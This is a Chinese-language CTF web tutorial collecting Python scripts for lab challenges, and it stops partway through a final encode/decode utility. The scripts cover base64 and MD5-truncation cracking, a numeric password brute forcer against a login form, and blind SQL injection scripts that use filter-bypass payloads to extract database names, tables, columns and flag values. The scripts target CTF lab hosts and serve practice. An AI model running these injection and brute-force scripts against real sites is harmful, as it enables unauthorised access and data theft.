CTF-web 第十一部分 實用指令碼
在我們進行有關的WEB題目解答時,指令碼的的編寫是一個必不可少的必備的技能。一般需要我們使用指令碼的情況只有兩種:
(1)要求速度的時候,往往我們手動的提交或者計算並不能滿足題目的要求速度。
(2)大量重複性的工作,比如進行密碼或者等其他的爆破。
這裡我們所記錄下來的指令碼,都是比較好懂的,常用的,在遇到有關的問題的時候,可以進行適當的修改。雖然前文在相關的部分已經附上了程式碼,但是在這裡總結一些吧,廢話不多數,直接上程式碼。
但是啊,我們自己還是需要多加練習的,當初比賽的時候,同組就有一個大佬,真的是手擼指令碼,跟他說需要啥功能,就看他在那裡自己造輪子,但是功底確實紮實,一會就弄出來了,相比之下我就不是很熟練..用什麼有時候還需要百度查一下。這裡的指令碼大部分都是做題的時候遇到的,或者更改的,有小部分是自己寫的,但是大部分都不是我弄得,提前說明一下哈。
迴圈多次解密
在題目中可能會有使用一個加密方法多次加密的情況,這時候我們就可以使用這個指令碼,其中的解密方法,資料等自己根據情況更改
import base64 def loopgetkey(data1): while 1: try: data1 = base64.decodebytes(data1) except: print(data1) break data="Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVjBaS2RHVkdXbFpOYWtFeFZtcEJlRll5U2tWVWJHaG9UV3N3ZUZadGNFZFpWMDE1VTJ0V1ZXSkhhRzlVVjNOM1pVWmtWMXBFVWxSTmF6RTBWMnRvUjFWdFNrZFhiR2hhWVRKb1JGWldXbUZqVmtaMFVteFNUbUY2UlRGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlVaclVqQTFSMXBGV2xOVWJGcFlaSHBHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMXdUMVF3TUhoalJscFlZbFZhY1ZadGRHRk5SbFowWlVoa1YwMUVSa1pWYkZKSFZqRmFSbUl6WkZkaGExcG9WakJhVDJOdFJraGhSazVzWWxob1dGWnRNSGRsUjBsNFUydGtXR0pIVWxsWmJGWmhZMnhXYzFWclpGZGlSbkJaV2xWYVQxWlhTbFpYVkVwV1lrWktTRlpxU2tabFZsWlpXa1prYUdFeGNGbFhhMVpoVkRKTmVGcElUbWhTTW5oVVZGY3hiMWRzV1hoWGJYUk9VakZHTlZaWE5VOWhiRXAwVld4c1dtSkhhRlJXTUZwVFZqSkdSbFJzVG1sU2JrSmFWMnhXWVZReFdsaFRiRnBZVmtWd1YxbHJXa3RTUmxweFVWaG9hMVpzV2pGV01uaHJZVWRGZWxGcmJGaFhTRUpJVmtSS1UxWXhXblZWYldoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxkSFVsWlVWbHBIVFRGU1ZtRkhPV2hpUlhCNldUQmFjMWR0U2toaFJsSlhUVVp3VkZacVNrZFNiRkp6Vkcxc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQlpWbXRXZDFZeGJISlhhM1JUVW14d2VGVXlkR3RoYlVwV1ZtcGFXbFpXY0doWlZXUkdaVWRPU0U5V1pHaGhNSEJ2Vm10U1MxUXlVa2RVYmtwaFVteEtjRlpxVG05V1ZscEhXVE5vYVUxWFVucFdNV2h2V1ZaS1IxTnVRbFZXTTFKNlZGUkdVMVp0UmtoUFZtaFRUVWhDU2xac1pEUmpNV1IwVTJ0a1dHSlhhR0ZVVnpWdlYwWnJlRmRyZEdwaVZrcElWbGQ0VDJGV1NYcFpNMmhYWVRGd2FGWlVSbFpsUm1SMVUyczFXRkpZUW5oV1YzaHJUa2RHUjFaWVpHaFNWVFZVVlcxNGQyVkdWbGRoUnpsb1RWWndlbFl5Y0VkV01ERjFZVWhLV2xaWFVrZGFWM2hIWTIxS1IxcEdaRTVOUlhCS1ZtMTBVMU14VlhoWFdHaFlZbXhhVmxsclpHOWpSbHB4VkcwNVYxWnRVbGhXVjNNMVZXc3hXRlZyYUZkTmFsWlVWa2Q0WVZKc1RuTmhSbFpYWWxaRmQxWnFRbUZaVm1SSVZXdG9hMUp0YUZSVVZXaERVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZteHdNMVl3V25KbFJtUnlaRWR3YVZacmNFbFdiR1EwWVRKR1YxTnVVbEJXUlRWWVZGYzFiMWRHYkhGVGExcHNVbTFTV2xkclZURldNVnB6WTBaV1dGWXpVbkpXVkVaelZqRldjMWRzYUdsV1ZuQlFWa1phWVdReVZrZFdXR3hyVWtWS1dGUldXbmRsVm10M1YyNWtXRkl3VmpSWk1GSlBWMjFGZVZWclpHRldNMmhJV1RJeFMxSXhjRWhpUm1oVFZsaENTMVp0TVRCVk1VMTRWbGhvV0ZkSGFGbFpiWGhoVmpGc2MxcEhPVmRTYlhoYVdUQmFhMkpIU2toVmJHeGhWbGROTVZsV1ZYaFhSbFp5WVVaa1RtRnNXbFZXYTJRMFV6RktjMXBJVmxSaVJscFlXV3RhZDA1c1draGxSMFphVm0xU1IxUnNXbUZWUmxsNVlVaENWbUpIYUVOYVJFWmhZekZ3UlZWdGNFNVdNVWwzVmxSS01HSXlSa2RUYms1VVlrZG9WbFpzV25kTk1WcHlWMjFHYWxacmNEQmFSV1F3VmpKS2NsTnJjRmhpUmxweVdYcEdWbVZXVG5OaVJuQk9UVzFvV1ZkV1VrZGtNa1pIVjJ4V1UySkdjSE5WYlRGVFRWWlZlV042UmxkTlZuQjZXVEJhVjFkR1duTlRhMmhoVWtWYWNsVnFTa3RUVmxKMFlVWk9WMVpHV2pKV2JHTjRUa2RSZVZaclpGZFhSM2h5VldwT1UySXhiSE5XYm1SWFRWWndNRmt3WkVkWFIwcEhZMFpvV2sxSFVuWldNbmhoVjBaV2NscEhSbGRXTVVwUlZsUkNhMUl4U1hsU2EyaHBVbXMxY0ZsVVFuZE5iRnAwVFZSQ1ZrMVZNVFJXVnpWVFZqSkZlVlZ1UmxaaVIxRXdWbTE0YzJNeGNFaFBWbVJUWWtWd1dsWkhlR3BPVmxsNFYyNVNWbUpIYUZoV2FrNU9UVlphV0dNemFGaFNiRnA2V1ZWYWExUnNXWGxoUkVwWFRWWndhRlY2Umt0ak1WSjFWV3hPYVZJeFNuZFdha0pXVFVVeFIxZHJhR3RTTUZwdlZGZHpNV1ZzV1hsT1ZrNW9UVlZ3TUZaWE5VTldNa3BJWVVWU1ZXSllhR2hXYkZwUFZsWktjMVpyTlZkaWEwWXpWbXhqZDAxV1RYaFhhMmhVWWtkb2IxVnFRbUZXYkZwMFpVaGtUazFZUWxsYVZXaExZa1paZUZkcmNGaGhNWEJRVm1wS1JtVkhUa1ZXYkdSVFVsWndlVmRZY0VkV2JWRjNUVlZzYVZJeWFGUlpiR2h2VjFaa1dHVkhPVkpOVlRFMFdUQmFZVll4WkVoaFJsSlZWbTFTVkZwWGVITldiR1J6Vkcxb1YyRXpRWGhXVm1RMFpERlplVk5zYkZaaVIyaG9WV3RXWVdOc1ZuRlRhM1JVVm1zMU1GVnRlRTlpUjBwWllVUlNWMDFYVVhkWFZtUlNaVlphY2xwR1pGaFNNMmg1Vmxkd1ExbFhUa2RXYmxKc1UwZFNjMWxyV25OT1ZuQldZVWQwV0ZKcmJETldiWEJUVjJzeFIxTnNRbGROYWtaSFdsWmFWMk5zY0VoU2JHUk9UVzFvU2xZeFVrcGxSazE0VTFob2FsSlhVbWhWYkZKWFZERldjMkZGVGxSTlZuQXdWRlpTUTFack1WWk5WRkpYWWtkb2RsWXdXbXRUUjBaSVlVWmFUbEp1UW05V2JURTBZekpPYzFwSVNtdFNNMEpVV1d0b1EwNUdXbkpaTTJSUFZteHNORll5TlU5aGJFcFlZVVpzVjJFeFZYaGFSM2h6VmpGYVdXRkdhRk5pUm5BMlYxWldZV0V4VW5OWFdHeG9Va1Z3V0ZSV1duZGhSbFkyVW10MGFrMVdTakZXVjNoRFZqSktSMk5HYkZoV00xSjJWVlJHVTFZeGNFbFViR2hwVmxad1dGWkdXbUZqTURWSFYxaHNUMVpyTlc5VVZsWnpUbFpzVm1GRlRsZGlWWEJKV1ZWV1UxWXdNVmRqUjJoYVRWWndVRmt4V2xkak1XUnlUbFprVGxaWGQzcFdiWGhUVXpBeFNGTlliRk5oTWxKVldXMXpNVlpXYkhKYVJ6bFhZa1p3ZWxZeU5XdFVhekZZWlVaa1YwMXFWbkpXVkVwTFUxWkdjbUZHWkZOTk1taFZWbTF3UzFNeVRuTlVia3BvVW0xU1ZGUlVTbTlpTVZweVZXdDBVMDFYVWtoVk1uaHpXVlpKZWxGc1VsZGhhelYyVmpGYWExZEhWa2hQVmtwT1ZtdHdTVmRVUW1GaU1rWjBWbTVLV0dKSGVGZFpiR2hUVFRGd1YxZHRkR3BpUjFJd1ZERmtiMVl3TVVkaE0yeFhZbFJCZUZscVJscGxSbVJ5VjJ4U2FXSklRbGhXYlhSWFdWZFdjMWR1UmxOaVIxSnhWRlprVTJWc2JGWmFTRTVvVm14d2VWa3dVbUZXTURGWVZWaGtXRlp0VWxOYVZscGhZMnh3UjFwR2FGTk5NbWcxVm14a01GWXhUWGhhUldSV1lrZFNXVmx0TVZOak1WcDBaVWhPVDFadVFsZFpWV1F3VjBaSmQyTkZhRnBOUm5CMlZqSnplRk5IUmtabFJtUk9ZbTFvYjFacVFtRldNazV6WTBWb1UySkhVbGhVVmxaM1ZXeGFjMVZyVGxkaGVsWllWakZvYjJGc1NsaGhSemxXWVd0d2RsWkVSbFprTVZweVpFVTFhVkp1UVhkWGJGWnFUbGRGZDAxV1drNVdSa3BZVm0weGIyUnNXWGRYYlhSVVVqQmFTbFZ0ZUdGaFZrbDRVbGhrVjJKVVJUQlpla3BPWlVaa2RWVnNUbWxTTVVwVlYxZDBWMlF4WkhOWGEyaHNVak5DVUZadE1WTlRSbGw1VGxVNWFHSkZjREJhVldSSFZsWmFWMk5HWkZWV2JIQjZWbXBHWVZkWFJraGpSMnhYVjBWS1NGWnRlR3RPUjBWNFZXNVNVMkpyTlZsWmExcGhWMVphZEUxV1NrNVNiRmt5VlcweFIyRnRSalpXYkdoYVlURndURmxXV2t0ak1rNUhZa1pvVjAweFNtOVhhMUpIWVRGWmVGcElTbWhTTTFKVVZGVmFkMWRXV2tkYVNIQnNVbFJXV0ZadE5WTmhNVW8yWWtaa1ZtSllhSHBVYkZwelZtMUdSbFJzWkdsV1dFSktWMVpXVjFVeFdYZE5WbVJxVWpKb1lWUldXbmRWUm10NFYyeGthazFYVW5sVWJGcHJWR3hhV0dRemNGZGlXR2hVVlhwQmVGTkdTbGxoUjBaVFZqSm9WbGRYZEd0aU1rbDRWbTVTVGxaNmJHRldiWGgzWlZaYWRFMVZaRlZoZWtaWldsVmFhMVl3TVhGV2JrcFhWa1Z3VEZVeFdrZGpiVVpIV2taT1RrMXRhRlpXYlRGM1V6Rk5lVlJ1VGxWaWEzQnhWVzB4YjJOR1ZuUmxTR1JwVFZkU1dGWlhkREJWTURGWFlrUlNWMUl6YUhwWlYzaExaRlpHY2s5V1ZsZGxhMW95Vm1wR1lWbFdTWGhpUkZwVFlsZDRUMVpxUmt0VFZscHhVMVJHVTAxV1ZqVlZNblJoWVd4T1JrNVdaRnBpUmtwSVZtdGFXbVZYVmtoa1IzQnBVbTVDVjFaWE1UUmlNVlY1VWxod1VtSlZXbGhXYlRGU1RVWnNObEp0ZEZOTlYxSXhWbGQ0WVdGSFNrbFJiR1JYWWxSRk1GcEVTbGRqTVdSMVVteE9hVkl4U25oV1JscHJWVEpXYzJKR1dtRlRSVFZ2Vm0xNGQyVldhM2RYYm1SWFRXdHdTVlpIY0ZOV1YwVjVWV3hPWVZac2NHaFpNbmgzVWpGd1NHSkhiRk5YUlVwU1ZtMHdlRTVIUlhoV1dHaGhVbGRTVjFsclduZFdNV3hWVTJ4T2FrMVdjREJhVlZZd1lrZEtSMk5FUWxWV1ZrcFlWbXBCZUZKV1NuTmFSbkJwWW10S1RWWnRNSGhUTVdSWFZtNVdXR0pIVW05WlZFWjNZakZhV0UxVVVtaE5helV3Vm0xMGExbFdTWGxoUnpsVlZrVktURlpYZUdGak1XdDZZVVU1VTJKWWFGcFdhMXB2WWpKR2MxTnNhR2hUUlVwWFdXeG9UbVZHV2tWU2JVWnFUVmRTZWxrd1pEUmhWa3AxVVZoa1dHSkdXbkpWYWtaaFkyc3hWMWR0YkZOU2EzQm9WMVpTUjJReVRuTlhXR1JoVWxoU2NWbHNWVEZTTVZGNFYyMTBhRlp0VWtsWGFrNTNWakpHY2xOdGFGcGxhMXB5VmpCYVUyTnNjRWhTYkU1cFZtdHdWbFl4WkRCWlYxRjNUbFprV0dKc1NrOVdhMVpMV1ZaYWRHVkZaRTlTYkhBd1dsVmFhMVpYU2taalJXeGFUVE5DZVZWR1JUbFFVVDA5" loopgetkey(bytes(data, encoding='utf-8'))
快速獲取響應資訊並提交
import base64 import requests # 本題目提醒 快速 提交給ichunqiu你發現的 需要session保持會話 # 測試相應中有ZmxhZ19pc19oZXJlOiBOalkwTXpZMA== 嘗試base64解碼 得到flag_is_here: NjY0MzY0= (每次不一樣) 還需要解碼 # 再次post提交 {"ichunqiu": 解碼資料} url = "http://607d622601d049a3a3e7ef03f58670e445529dac09dd4a96.game.ichunqiu.com/" a = requests.session() b = a.get(url) data = b.headers["flag"] datadecode = base64.b64decode(data) # flag_is_here: NjY0MzY0 需要使用:進行分組 splitstr = str(datadecode).split(':') key = splitstr[1].replace('\'', '') # 對後面的再次解碼 key1 = base64.b64decode(key) body = {"ichunqiu": key1} print(body) f = a.post(url, data=body) print(f.text) # 原版好用 但是過濾不強 # import base64,requests # # a = requests.session() # b = a.get("http://8564a824863f418484029f2013a3dcf3412fa4677a31498d.game.ichunqiu.com/") # key1 = b.headers["flag"] # c = base64.b64decode(key1) # d = str(c).split(':') # key = base64.b64decode(d[1]) # body = {"ichunqiu":key} # f = a.post("http://8564a824863f418484029f2013a3dcf3412fa4677a31498d.game.ichunqiu.com/", data=body) # print(f.text)
MD5截斷值爆破
MD5截斷數值已知 求原始資料,這種題是十分常見的
import hashlib
from multiprocessing.dummy import Pool as ThreadPool
# MD5截斷數值已知 求原始資料
# 例子 substr(md5(captcha), 0, 6)=60b7ef
def md5(s): # 計算MD5字串
return hashlib.md5(str(s).encode('utf-8')).hexdigest()
keymd5 = '8e6d35' #已知的md5截斷值
md5start = 0 # 設定題目已知的截斷位置
md5length = 6
def findmd5(sss): # 輸入範圍 裡面會進行md5測試
key = sss.split(':')
start = int(key[0]) # 開始位置
end = int(key[1]) # 結束位置
result = 0
for i in range(start, end):
# print(md5(i)[md5start:md5length])
if md5(i)[0:6] == keymd5: # 拿到加密字串
result = i
print(result) # 列印
break
list=[]
for i in range(10): # 多執行緒的數字列表 開始與結尾
list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool() # 多執行緒任務
pool.map(findmd5, list)
pool.close()
pool.join()
MD5截斷值爆破2
這個指令碼不同於上一個的地方是,對原本的數值是有要求的,比如變數擁有一部分固定值,猜測是字元是在一定範圍內的
import hashlib
import random
import requests
# MD5截斷數值已知
# 變數值有一定要求
# 求原始資料
# 本題 限制120s 爆破10次以上 變數固定前兩個字元,MD5截斷為固定值
def md5(s):
return hashlib.md5(str(s).encode('utf-8')).hexdigest()
# substr(md5($value),5,4)==0)
def findbest(s):
for i in range(1000000):
str = s + random.choice(guess)
str = str + random.choice(guess)
str = str + random.choice(guess)
str = str + random.choice(guess)
str = str + random.choice(guess)
str = str + random.choice(guess)
if (md5(str))[5:9] == "0000":
print(str)
return str
# 訪問並擷取新的關鍵字
def url_open(keystr, url, session):
payload= "value="+keystr
respon = a.get(url + payload).text
print(respon[0:2])
return respon[0:2], len(respon), respon
# 初始連線 字符集
urllink = "http://aa153e3db8114f409fa459050284db8920827b2ffaa34944.game.ichunqiu.com/?"
# guess = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"]
guess = "abcdefghijklmnopqrstuvwxyz"
a = requests.session()
# 初始key關鍵字
keyfirst = 'ea'
# 普通返回長度
normallen = 0
for i in range(1, 100):
# 尋找滿足條件的字串
keystr = findbest(keyfirst)
# 請求獲取新的key關鍵字 記錄普通長度 比對flag長度
keyfirst,length, res = url_open(keystr, urllink, a)
if i == 1:
normallen =length
else:
if normallen < length:
print(res)
break
一次驗證,爆破密碼
在有關驗證碼的題目中,我們有的題目只需要一次驗證即可以一直使用,在這種情況下,需要我們爆破擁有一定格式的密碼(可以自行設定裁剪的範圍)
import requests
# 針對一次性驗證碼 爆破數字密碼用
url = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php'
header = {
"Host": "lab1.xseclab.com",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php",
"Cookie": "PHPSESSID=7667f63d7c38a42374e3afaa9a203d86",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "48"
}
# 設定引數變化範圍
start = 1000
final = 9999
step = 1
startlength = 0 # 記錄初始返回相應的長度 如果響應長度發生變化 那就是找到了
for i in range(start, final, step):
payload = {'username': 'admin', 'pwd': i, 'vcode': 'JQ28', 'submit': 'submit'}
contents = requests.post(url=url, headers=header, data=payload).content.decode('utf-8')
if i == start:
startlength = len(contents)
else:
if len(contents) > startlength:
print("%d : %s" % (i, contents))
break
sql 暴力猜解
import requests
# 本指令碼用於自動爆破資料庫長度 名字 表的長度名字 欄位數值等
# 使用中,6個函式需要自己手動執行,根據返回的引數帶入到下一個函式進行
# 具體的每個函式的利用程式碼 需要根據情況更改
url = "http://ctf5.shiyanbar.com/web/earnest/index.php" # 測試的路徑
str = "You are in" # 成功時可以在響應中匹配到的字串,用於判斷
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]." # 名字猜解的字元範圍
def get_ku_length():
print('start')
for i in range(1, 30):
key = {'id': "0'oorr(length(database())=%s)oorr'0" % i}
res = requests.post(url, data=key).text
print(i)
if str in res:
print("find the length %s" %i)
break
def get_ku_name():
database = ''
print('start')
for i in range(1, 19):
for j in guess:
key = {'id': "0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (i, j)}
res = requests.post(url, data=key).text
print('............%s......%s.......' % (i, j))
if str in res:
database += j
break
print(database)
def get_table_length():
i = 1
print("start")
while True:
# 多個表名使用@隔開
res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i
res = res.replace(' ', chr(0x0a))
key = {'id': res}
r = requests.post(url, data=key).text
print(i)
if str in r:
print("length: %s" % i)
break
i += 1
print("end!")
def get_table_name():
table = ""
print("start")
for i in range(1, 12):
for j in guess:
res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tab" \
"les)where(table_schema)=database())='%s')oorr'0" % (i, j)
# 由於遮蔽空格 替換為換行符號
res = res.replace(' ', chr(0x0a))
key = {'id': res}
r = requests.post(url, data=key).text
print('---------%s---------%s' % (i, j))
if str in r:
table += j
break
print(table)
print("end!")
def get_ziduan_length(table_name):
i = 1
print("start")
while True:
# res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0" % i
res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)="% i
res += "'"+table_name + "')='')oorr'0"
print(res)
res = res.replace(' ', chr(0x0a))
key = {'id': res}
r = requests.post(url, data=key).text
print(i)
if str in r:
print("length: %s" % i)
break
i += 1
print("end!")
def get_ziduan_name():
column = ""
print("start")
for i in range(1, 6):
for j in guess:
res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (
i, j)
res = res.replace(' ', chr(0x0a))
key = {'id': res}
r = requests.post(url, data=key).text
print("......%s.........%s........." % (i, j))
if str in r:
column += j
break
print(column)
print("end!")
def get_value():
flag = ""
print("start")
for i in range(1, 20):
for j in guess:
res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (i, j)
res = res.replace(' ', chr(0x0a))
key = {'id': res}
r = requests.post(url, data=key).text
'print("........%s..........%s........"%(i,j))'
if str in r:
flag += j
print(flag)
break
print(flag)
print("end!")
get_ziduan_length('fiag')
sql bool爆破自動指令碼
import requests
def str_to_hex(s):
return ''.join([hex(ord(c)).replace('0x', '') for c in s])
def boom():
url = 'http://7e14e5869b3e4d77a8e5ef931f13dafed89ecee1787c4d59.game.ichunqiu.com/index.php'
s = requests.session()
dic = "[email protected]#$%^&*()_+{}-=" # 名字猜解的字元範圍
right = 'password error!'
error = 'username error!'
lens = 0
i = 0
while True:
payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"
data = {'username': payload, 'password': 1}
r = s.post(url, data=data).content.decode()
if error in r:
lens = i
break
i += 1
pass
print("[+]length(database()): %d" %(lens))
strs=''
for i in range(lens+1):
for c in dic:
payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) + ",1))=" + str(ord(c)) + "#"
data = {'username': payload, 'password': 1}
r = s.post(url,data=data).content.decode()
if right in r:
strs = strs + c
print(strs)
break
pass
pass
print("[+]database():%s" %(strs))
lens=0
i = 1
while True:
payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=" \
"database() limit 0,1)>" + str(i) + "#"
data = {'username': payload, 'password': 1}
r = s.post(url,data=data).content.decode()
if error in r:
lens = i
break
i+=1
pass
print("[+]length(table): %d" %(lens))
strs=''
for i in range(lens+1):
for c in dic:
payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_" \
"schema=database() limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
data = {'username': payload, 'password': 1}
r = s.post(url, data=data).content.decode()
if right in r:
strs = strs + c
print(strs)
break
pass
pass
print("[+]table_name:%s" %(strs))
tablename = '0x' + str_to_hex(strs)
table_name = strs
lens=0
i = 0
while True:
payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where" \
" table_name = " + tablename + " limit 0,1)>" + str(i) + "#"
data = {'username': payload, 'password': 1}
r = s.post(url,data=data).content.decode()
if error in r:
lens = i
break
i += 1
pass
print("[+]length(column): %d" %(lens))
strs=''
for i in range(lens+1):
for c in dic:
payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
data = {'username': payload, 'password': 1}
r = s.post(url,data=data).content.decode()
if right in r:
strs = strs + c
print(strs)
break
pass
pass
print("[+]column_name:%s" %(strs))
column_name = strs
num=0
i = 0
while True:
payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
data = {'username': payload, 'password': 1}
r = s.post(url, data=data).content.decode()
if error in r:
num = i
break
i+=1
pass
print("[+]number(column): %d" %(num))
lens=0
i = 0
while True:
payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
data = {'username': payload, 'password': 1}
r = s.post(url, data=data).content.decode()
if error in r:
lens = i
break
i+=1
pass
print("[+]length(value): %d" %(lens))
i=1
strs=''
for i in range(lens+1):
for c in dic:
payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
data = {'username': payload, 'password': '1'}
r = s.post(url, data=data).content.decode()
if right in r:
strs = strs + c
print(strs)
break
pass
pass
print("[+]flag:%s" %(strs))
if __name__ == '__main__':
boom()
print('Finish!')
sql 使用like暴力猜解
import string
import requests
url = 'http://4a899a854a124b3ba03b32764e949ce4d677a918742d4c56.game.ichunqiu.com/Challenges/index.php'
headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
payloads = string.ascii_letters + string.digits
temp = ''
for i in range(40):
print("hello")
for p in payloads:
payload = temp + p
name = "admin' or user_n3me like '{}%' ;#".format(payload)
data = dict(username=name, passwrod='test')
res = requests.post(url, headers=headers, data=data)
if (len(res.content) == 12):
temp = temp + p
print(temp.ljust(32, '.'))
break
內容匹配與提交
這是那個要求快速計算加減乘除然後上交的,我們可能還會遇到其他的不同要求的,要學會使用正則表示式進行匹配,然後進行字串操作提取關鍵資訊。
import requests
import re
url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
respon = requests.get(url)
# print(respon.content)
# rmatch = re.compile("[0-9]{2,5}")
# # 2559*81551+1066*(2559+81551)
# findall 和 match的區別 match是匹配不上的 因為是從源頭匹配 匹配不到就沒有結果
es = re.findall(r"\d{2,6}", respon.content.decode('utf-8'))
result = int(es[0])*int(es[1])+int(es[2])*(int(es[3])+int(es[4]))
# print(result)
# 第二次提交資料 注意提交資料也是鍵值對形式
date = {"v": str(result)}
header = {'Cookie': 'PHPSESSID=356ee82e732bcef813ac0b37ba8fddf5'}
response = requests.post(url, headers=header, data=date)
print(response.content.decode('utf-8'))
import requests
import re
url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
header = {'Cookie': 'PHPSESSID=356ee82e732bcef813ac0b37ba8fddf5'} #填入自己的cookie
contents = requests.get(url, headers = header).content.decode('utf-8')
matches = re.search("(.+)=<(input)", contents)
data = {'v': str(eval(matches.group(1)))}
contents = requests.post(url, headers=header, data=data).content.decode('utf-8')
matches = re.search("<body>(.*)</body>", contents)
print(matches.group(1))
常用CTF工具
這是網上一個大佬寫的,主要就是各種加密解密的指令碼,但是大多數都可以使用網上線上的解碼,不過就作為一個擴充套件吧。
# -*- coding:utf-8 -*-
import hashlib
import base64
import urllib
import argparse
"""
名字:CTF之常用工具彙總
作者:白貓
時間:2018-3-22
QQ :1058763824
"""
def menu():
usage = """
-m MD5 encryption
-s SH1 encryption
-h Show help information
-b64 Base64 encode
-b32 Base32 encode
-b16 Base16 encode
-db64 Base64 decode
-db32 Base32 decode
-db16 Base16 decode
-urlen URL encode
-urlde URL decode
-bin Binary To Decimal
-octal Octal to Decimal
-hex Hexadecimal to Decimal
-dbin Decimal To Binary
-doctal Decimal to Octal
-dhex Decimal to Hexadecimal
-ord Letter To ASCII Example -ord asdfasfa -ord='dfafs afasfa asfasf'
-chr ASCII To Letters Example -chr 105 -chr = '102 258 654'
"""
# 在使用ord 和chr命令的時候要注意如果輸入的字元和數字不包含空格則直接實用例子前面的命令如果包含空格則使用後面的命令
parser = argparse.ArgumentParser()
parser.add_argument('-m', dest='md', help='MD5 encryption')
parser.add_argument('-s', dest='sh', help='SH1 encryption')
parser.add_argument('--h', action="store_true", help='Show help information')
parser.add_argument('-b64', dest='b64', help='Base64 encode')
parser.add_argument('-b32', dest='b32', help='Base32 encode')
parser.add_argument('-b16', dest='b16', help='Base16 encode')
parser.add_argument('-db64', dest='db64', help='Base64 decode')
parser.add_argument('-db32', dest='db32', help='Base32 decode')
parser.add_argument('-db16', dest='db16', help='Base16 decode')
parser.add_argument('-urlen', dest='urlen', help='URL encode')
parser.add_argument('-urlde', dest='urlde', help='URL decode')
parser.add_argument('-bin', dest='bin', help='Binary To Decimal')
parser.add_argument('-octal', dest='octal', help='Octal to Decimal')
parser.add_argument('-hex', dest='hex', help='Hexadecimal to Decimal')
parser.add_argument('-dbin', dest='dbin', help='Decimal To Binary ')
parser.add_argument('-doctal', dest='doctal', help='Decimal to Octal ')
parser.add_argument('-dhex', dest='dhex', help='Decimal to Hexadecimal')
parser.add_argument('-ord', dest='ord',
help="Letter To ASCII Example -ord aaaaaa , -ord=\"aaa aaa\"")
parser.add_argument('-chr', dest='chr',
help="ASCII To Letter Example -chr 105 , -chr = \"101 101\" ")
options = parser.parse_args()
if options.md:
s = options.md
md5(s)
elif options.sh:
s = options.sh
sh1(s)
elif options.b64:
s = options.b64
stringToB64(s)
elif options.b32:
s = options.b32
stringToB32(s)
elif options.b16:
s = options.b16
stringToB16(s)
elif options.db64:
s = options.db64
b64ToString(s)
elif options.db32:
s = options.db32
b32ToString(s)
elif options.db16:
s = options.db16
b16ToString(s)
elif options.urlen:
s = options.urlen
urlEncode(s)
elif options.urlde:
s = options.urlde
urlDecode(s)
elif options.bin:
s = options.bin
binToDec(s)
elif options.octal:
s = options.octal
octToDec(s)
elif options.hex:
s = options.hex
hexToDec(s)
elif options.dbin:
s = options.dbin
decToBin(s)
elif options.doctal:
s = options.doctal
decToOct(s)
elif options.dhex:
s = options.dhex
decToHex(s)
elif options.doctal:
s = options.doctal
decToOct(s)
elif options.dhex:
s = options.dhex
decToHex(s)
elif options.ord:
s = options.ord
lettToASCII(s)
elif options.chr:
s = options.chr
asciiToLett(s)
else:
helpInfo()
def helpInfo():
print("""
-m MD5 encryption
-s SH1 encryption
--h Show help information
-b64 Base64 encode
-b32 Base32 encode
-b16 Base16 encode
-db64 Base64 decode
-db32 Base32 decode
-db16 Base16 decode
-urlen URL encode
-urlde URL decode
-bin Binary To Decimal
-octal Octal Decimal to Decimal
-hex Hexadecimal to Decimal
-dbin Decimal To Binary
-doctal Decimal to Octal
-dhex Decimal to Hexadecimal
